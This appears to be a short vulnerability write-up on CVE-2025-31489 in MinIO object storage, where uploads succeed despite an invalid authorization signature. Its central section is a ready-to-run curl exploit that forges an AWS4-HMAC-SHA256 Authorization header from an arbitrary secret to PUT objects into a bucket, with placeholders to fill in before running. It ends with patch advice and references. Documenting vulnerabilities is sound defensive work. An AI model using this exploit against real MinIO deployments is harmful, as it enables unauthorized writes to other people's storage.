CVE-2025-31489 - Exploiting MinIO Object Storage with an Invalid Authorization Signature

MinIO is a high-performance object storage solution, released under the GNU Affero General Public License v3.. It is designed to be cloud-native and supports the Amazon S3 API. However, a recent vulnerability has been discovered (CVE-2025-31489) where the signature component of the authorization may be invalid. This can potentially allow unauthorized users to upload objects to MinIO buckets given they have prior knowledge of the access-key, the bucket name, and provided they have WRITE permissions on the bucket. This vulnerability has been fixed in the latest RELEASE.2025-04-03T14-56-28Z.

Vulnerability Details

A client using an arbitrary secret can upload objects to a MinIO bucket without proper authentication given they have the necessary access information. Prior knowledge of the user's access-key, and the bucket name is required, along with an access-key with WRITE permissions.

With relevant information in place, uploading random objects to buckets is trivial and easy using a curl command.

The following code demonstrates how to exploit this vulnerability using curl

# Variables
ACCESS_KEY="<access_key_here>"
BUCKET_NAME="<bucket_name_here>"
FILE_PATH="<path_to_object_here>"
ENDPOINT="<minio_endpoint_here>"
# Exploiting the issue
curl -v -X PUT -T "${FILE_PATH}" --location "http://${ENDPOINT}/${BUCKET_NAME}/$(basename ${FILE_PATH})" \
-H "Host: ${ENDPOINT}" \
-H "Date: $(date -u)" \
-H "x-amz-content-sha256: UNSIGNED-PAYLOAD" \
-H "Authorization: AWS4-HMAC-SHA256 \
Credential=${ACCESS_KEY}/$(date +%Y%m%d)/us-east-1/s3/aws4_request, \
SignedHeaders=host;date;x-amz-content-sha256, \
Signature=$(echo -n "UNSIGNED-PAYLOAD" | openssl sha256 -hmac "<arbitrary_secret_here>")"

Replace the variables in angle brackets with appropriate values before running the command.

For more information about this exploit, please refer to the following resources

1. MinIO Official Website: https://min.io/
2. GNU Affero General Public License v3.: https://www.gnu.org/licenses/agpl-3..en.html
3. CVE-2025-31489 Official Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31489
4. MinIO RELEASE.2025-04-03T14-56-28Z Release Notes: https://github.com/minio/minio/releases/tag/RELEASE.2025-04-03T14-56-28Z

Conclusion

The CVE-2025-31489 exploit allows unauthorized users to upload objects to MinIO buckets with an invalid authorization signature. It is highly recommended to update MinIO to the latest version (RELEASE.2025-04-03T14-56-28Z) to mitigate this vulnerability. Always ensure that your MinIO instance is up-to-date and follows best security practices.

Timeline

Published on: 04/03/2025 20:15:25 UTC
Last modified on: 04/07/2025 14:18:34 UTC